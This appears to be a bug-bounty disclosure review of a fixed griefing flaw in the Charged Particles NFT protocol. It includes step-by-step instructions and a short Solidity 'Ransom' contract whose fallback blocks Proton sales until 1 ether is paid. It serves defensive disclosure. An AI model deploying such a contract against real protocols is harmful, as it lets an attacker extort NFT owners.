Charged Particles Griefing Bugfix Review
Summary
Whitehat Alejandro Muñoz-McDonald submitted a vulnerability classified as “High” in Charged Particles on February 9. The vulnerability was a griefing/denial of service attack against the protocol that would have allowed a malicious user to create a system where bribes had to be paid for a user to buy or sell an NFT. Charged Particles paid Alejandro Muñoz-McDonald a $5,000 USDC bounty.
Vulnerability Analysis
Charged Particles is a decentralized NFT marketplace where users can deposit ERC-20 tokens into any NFT. Under the Charged Particles protocol, a “Proton” refers to the ERC721 contract for a particle, which is an NFT ready to be energized by adding interest-bearing assets to it. Prior to the fix of this vulnerability, a malicious proton creator could have held Protons hostage after selling them by creating a malicious ransom contract and setting it to be the royalties receiver. The bug was found in Proton.sol.
This vulnerability can be illustrated in a step by step analysis.
1. Call createProtonForSale with valid parameters and a royaltiesPercent > 0. Move to the next step when the token is sold
2. Create a malicious ransom contract
pragma solidity 0.6.12; contract Ransom { bool internal ransomEnabled = true; constructor() public {} function unlockNFT() public payable { if(msg.value >= 1 ether) { ransomEnabled = false; } } fallback() external payable { require(!ransomEnabled); }}
3. Call setCreatorRoyaltiesReceiver(…) with the energizedParticleId and the address of the malicious contract.
4. With setCreatorRoyaltiesReceiver called, the Proton is locked and cannot be sold because the default payable function of the ransom contract reverts as long as the ransom has not been paid
Vulnerability Fix
Charged Particles quickly implemented a fix of the bug, which is available here:
Acknowledgements
We’d like to thank Charged Particles for quickly acknowledging the bug and implementing a fix. Charged Particles has paid out a bounty of $5,000 to whitehat Alejandro Muñoz-McDonald. To report additional vulnerabilities, please see Charged Particles’ bug bounty program with Immunefi.
If you’d like to start bug hunting, we got you. Check out the Web3 Security Library, and start earning rewards on Immunefi — the leading bug bounty platform for web3 with the world’s biggest payouts.
If you’re interested in protecting your project with a bug bounty like Charged Particles, visit the Immunefi services page and fill out the form.
